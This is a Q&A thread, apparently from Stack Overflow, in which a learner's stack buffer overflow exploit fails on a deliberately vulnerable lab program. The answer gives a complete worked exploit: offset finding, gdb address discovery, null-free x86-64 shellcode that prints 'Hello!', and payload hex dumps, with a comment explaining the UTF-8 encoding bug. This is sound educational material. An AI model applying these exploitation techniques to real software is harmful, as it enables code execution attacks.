Unable to inject shellcode in vulnerable program

Question

I am studying the stack-base buffer overflow vulnerability. I would like to inject the following shellcode I wrote:

BITS 64

jmp short one

two:
    pop rcx
    xor rax,rax
    mov al, 4
    xor rbx, rbx
    inc rbx
    xor rdx, rdx
    mov dl, 15
    int 0x80

    mov al, 1
    dec rbx
    int 0x80

one:
    call two
    db "Hello, Friend.\n", 0x0a

I disabled ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) and compiled the program using -fno-stack-protector -z execstack, but still when I run the command:

root@computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')

this is what I get:

Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault

The offset (64) is calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian of 0x7fffffffe76b, the env-var in which the shellcode is in. I also hexdumped the injected program, making sure no null bytes were present:

00000000  eb 1a 59 48 31 c0 b0 04  48 31 db 48 ff c3 48 31  |..YH1...H1.H..H1|
00000010  d2 b2 0f cd 80 b0 01 48  ff cb cd 80 e8 e1 ff ff  |.......H........|
00000020  ff 48 65 6c 6c 6f 2c 20  46 72 69 65 6e 64 2e 5c  |.Hello, Friend.\|
00000030  6e 0a                                             |n.|
00000032

The address was calculated using:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int pl = strlen(*argv);
    char *addr = getenv(*++argv);
    addr += (pl - strlen(*++argv))*2;
    printf("\n%s @ %p\n\n", *--argv, addr);
}

A changed version of the program in Jon Erickson's book.

This is the program with the vulnerability:

//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void hidden(void){
    printf("Welcome to the dark side, young padawan");
    exit(0);
}

void welcome(char *s){
    char buffer[50];
    //int placeholder = 13;
    strcpy(buffer, "Welcome ");
    strcat(buffer, s);
    printf("%s\n", buffer);
}

int main(int argc, char **argv){
    if(--argc < 1){
        printf("\nUsage: %s [NAME]\n\n", *argv);
        exit(1);
    }
    welcome(*++argv);
}

Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):

(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffdda0: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffddb0: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffddc0: 0x00000000  0x00000000  0xf7ffe180  0x00007fff
0x7fffffffddd0: 0x00000002  0x00000000  0x555551bf  0x00005555
0x7fffffffdde0: 0x00000000  0x00000000  0xffffe2cf  0x00007fff
0x7fffffffddf0: 0x636c6557  0x20656d6f  0x41414141  0x41414141
0x7fffffffde00: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde10: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde20: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde30: 0x41414141  0x41414141  0xafc394c2  0xc335b8c3
0x7fffffffde40: 0xff007fbc  0x00007fff  0x00000000  0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü

Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16  }

After the padding (0x41), the return address is ruined due to the double byte representation of \xff.

Can someone help me understand why I am not able to inject the shellcode?

Weird, you had "\x6b\xe7\xff\xff\xff\x7f" but I don't see 6B or E7 in your stack dump anywhere. — puppydrum64, Dec 22 '22 at 17:16
Also it's unclear how your address calculation is supposed to work. What you should do instead is look at the disassembly of `welcome` in the actual program so you can determine the offset. — Jester, Dec 22 '22 at 17:30
@puppydrum64 Exactly. Instead of `\xff` I have `\xbc\xc3`. Any idea why? Solving this might make me able to finally inject the code — KmerPadreDiPdor, Dec 22 '22 at 18:35
@Jester Could you please make yourself clearer? The problem is not the function `welcome()`. The offset is correct, I tested it already changing the flow of the program (executing `hidden()`, which is not in main). The problem is why the return address gets ruined hence cannot inject correctly the shellcode. Thanks anyway — KmerPadreDiPdor, Dec 22 '22 at 18:39
Put a breakpoint on `main` and verify your payload gets there properly. — Jester, Dec 22 '22 at 18:51
@Jester Apologise me, but I still don't get it. If I set a breakpoint on main, then to exam the payload I have to step in `welcome()`, thing that I did (in the question), and I get always the same result, the shellcode is in the env-var, I inject the address of the env-var and the exeption of RIP (not a valid address -> sigsegv) raise... I just want to understand why the return address get messed up during the injection because I suppose this is the reason why I am having all of this difficulties, nevertheless thanks again you are trying to help. — KmerPadreDiPdor, Dec 22 '22 at 20:31
1. There are no env vars in the program 2. According to gdb your shellcode is not what you showed which is why you should check that it gets into `main` to start with. — Jester, Dec 22 '22 at 21:03
Even if you did inject this code, stack addresses will be outside the low 32 bits, so `int 0x80` will return `-EFAULT` instead of printing because ECX, the low 32 bits of RCX, isn't a valid address. [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](https://stackoverflow.com/q/46087730) — Peter Cordes, Dec 22 '22 at 21:50
@ Peter Cordes Any suggestion on how to solve this problem and inject the code? — KmerPadreDiPdor, Dec 23 '22 at 17:16

score 4 · Answer 1 · edited Dec 23 '22 at 22:33

First of all, use 64-bit code when exploiting a 64-bit executable. int 0x80 is the old 32-bit syscall interface.

Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding. See below if you still want to use an environment variable.

Passing the shellcode in the buffer

I won't disable ASLR globally and instead rely on GDB setting the appropriate personality of the debugged process to individually disable ASLR.
Since the process read the string from the command line, this gets tricky (but not much) because the command line arguments will shift the stack pointer down (the bigger they are the lower the stack pointer will be) at the program entry-point (Linux saves environments variables and command line arguments above the stack).
This will change the actual address where the shellcode will be loaded.

So you first need to know how big the shellcode will be and for that you need to also know how much data is needed to overwrite the return address, you can do this by inspecting the disassembly of welcome.
For a function as simple as it is, objdump will suffice:

000000000000118b <welcome>:
    118b:   55                      push   %rbp
    118c:   48 89 e5                mov    %rsp,%rbp
    118f:   48 83 ec 50             sub    $0x50,%rsp
    1193:   48 89 7d b8             mov    %rdi,-0x48(%rbp)    ;message

    1197:   48 8d 45 c0             lea    -0x40(%rbp),%rax    ;buffer
    119b:   48 b9 57 65 6c 63 6f    movabs $0x20656d6f636c6557,%rcx "Welcome "
    11a2:   6d 65 20 
    11a5:   48 89 08                mov    %rcx,(%rax)
    11a8:   c6 40 08 00             movb   $0x0,0x8(%rax)      

    11ac:   48 8b 55 b8             mov    -0x48(%rbp),%rdx    ;message
    11b0:   48 8d 45 c0             lea    -0x40(%rbp),%rax    ;buffer
    11b4:   48 89 d6                mov    %rdx,%rsi
    11b7:   48 89 c7                mov    %rax,%rdi
    11ba:   e8 91 fe ff ff          call   1050 <strcat@plt>   ;<--

    11bf:   48 8d 45 c0             lea    -0x40(%rbp),%rax
    11c3:   48 89 c7                mov    %rax,%rdi
    11c6:   e8 65 fe ff ff          call   1030 <puts@plt>
    11cb:   90                      nop
    11cc:   c9                      leave
    11cd:   c3                      ret

You can see from my comment that the string buffer is at rbp-0x40.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome ", since this is a strcat, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.

Create a file with 72 bytes:

> python -c 'print("A"*72, end="")' > shellcode

Now use this file and GDB to find out the address of buffer:

> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13      strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0

0x7fffffffe2d0 is the address of buffer we now know:

The shellcode will be 8 bytes into buffer: 0x7fffffffe2d8
The return address will be 64 bytes into the shellcode (due to the consideration above).

It's time to write a shellcode and test it. Since we are passing it in the command line it must also not contain new lines. However printing a new line is useful to flush the current line to stdout, so I used an ugly hack to make a new line at the end of the string at runtime.
The ugly shellcode code is:

BITS 64

;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60

;Constants
%define STDOUT 1
%define MASK 0x01010101


;Emulate a zero-free move of a byte
%macro zfmov 2
    push %2
    pop %1
%endm

;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
    lea %1, [REL %2 + MASK]     ;Add the mask to avoid zeros for small displacements
    sub %1, MASK            ;Remove the mask
%endm

;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa  ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0  ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall

;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall

message db "Hello!A"        ;Last char is replaced with a new line
  .len EQU $-message

Now assemble this:

> nasm shellcode.asm -o shellcode

and add any padding to make the file 64 bytes in size and then add the return address found above:

0000:0000 | 6A 01 58 6A  01 5F 48 8D  35 1C 01 01  01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01  C6 46 06 AA  80 76 06 A0  6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58  31 FF 0F 05  48 65 6C 6C  6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF  FF 7F 00 00                           | Øâÿÿÿ...

The stack is aligned on 16 bytes so as long as your shellcode length is between 0x40 and 0x4f (ends included) the shellcode address won't change.

Finally, run the shellcode:

> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]

Passing the shellcode in an envar

I assume you read the section above.

The address of the envar depends both on its size and the size of the command line argument. The command line argument must be at least 64 + 6 bytes long (6 because the last two bytes of the return addresses are zero, so 6 suffices), and the shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar is sensitive to the size of the shellcode to the byte granularity but it's sensitive to the size of the command line argument only on 16B steps (once this quantity was called a paragraph) because the stack is aligned on this size.

Write a 70-bytes file with a recognizable pattern, like:

0000:0000 | 43 41 4E 41  52 59 41 41  41 41 41 41  41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41  41 41                                 | AAAAAA

Call it pattern. This will simulate the shellcode and we now need it to have a few distinct bytes we can search for.

Create another 70-bytes file with another pattern:

0000:0000 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41  41 41                                 | AAAAAA

call it placeholder. This will simulate the command line argument.

Find where the envar is with gdb. Remember that we need to pass 70 bytes as the command line argument to simulate the condition under which the program will be run.
The file placeholder will be used for this purpose and the filepattern will be used for searching its first bytes in memory.

> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19      if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f

Now edit placeholder and put the address found in its last 6 bytes:

0000:0000 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF  FF 7F                                 | .ìÿÿÿ.

This is the final value of the command line argument.

Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:

BITS 64

;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60

;Constants
%define STDOUT 1
%define MASK 0x01010101


;Emulate a zero-free move of a byte
%macro zfmov 2
    push %2
    pop %1
%endm

;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
    lea %1, [REL %2 + MASK]     ;Add the mask to avoid zeros for small displacements
    sub %1, MASK            ;Remove the mask
%endm

;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall

;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall

message db "Hello!", 0x0a       ;Last char is replaced with a new line
  .len EQU $-message
  
TIMES 70 -($-$$) db 'A'

Assemble it:

> nasm shellcode.asm -o shellcode

We can now run it:

> SC=$(cat shellcode)  gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]

How does it work?

Out strategy has been that of using GDB to replicate the program runtime conditions when it will be exploited.
In the first section we are interested in finding the address of buffer, we realized that this depends on the size of the command line arguments so we first found out the shellcode size by statically analyzing the program and then we found the address of buffer using a fake shellcode.
The exploitation itself is pretty basic, the stack is executable and the return address is simply overwritten to steer the execution.

In the second section, we are interested in finding the address of an envar value that the kernel places above the stack.
We proceed in the same manner, we use a fake command line argument, a fake shellcode with a recognizable pattern and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one but the shellcode is inside an envar (which allows for newlines and whatnot). What are interested in finding the address

The second method (the one I am interested in) is not working. Fine until the 'finding the pattern', which I changed a bit (ABC + A * 67). Then when I modified `placeholder` with `python -c 'print("A" * 64 + "\xbf\xed\xff\xff\xff\x7f")' > placeholder` the last line was `00000040 c2 bf c3 ad c3 bf c3 bf c3 bf 7f 0a |............|`: same problem as happened so far with my method. So, produced the shellcode with `nasm`, I used gdb still and got `Program received signal SIGSEGV, Segmentation fault. 0x00005555555551c6 in welcome (s=0x7fffffffe2b5 'A' , "¿íÿÿÿ\177") — KmerPadreDiPdor, Dec 24 '22 at 13:52
Sorry for the bad format, I had not that much space to explain myself. Anyway , to make it clear, the address in the python command is the one found using pattern, and the "last line" above, is the last line of `hexdump -C placeholder`. I still do not understand why `\xff` is represented as `\xbf\xc3` hence with two bytes, because is this the real problem why the shellcode does not get injected, even with my method... — KmerPadreDiPdor, Dec 24 '22 at 13:54
@KmerPadreDiPdor Python 3 uses Unicode strings (which are printed by `print`) and UTF-8 as the default encoding. `0xce 0xbf` are the utf-8 code units of `\u00ff`. Use `bytes` and write directly to STDIO with `sys.stdout.buffer.write`. Or just use a hex editor. Also `print` add a new line which will mess up the second method. — Margaret Bloom, Dec 24 '22 at 16:59

Unable to inject shellcode in vulnerable program

1 Answers1

Passing the shellcode in the buffer

Passing the shellcode in an envar

How does it work?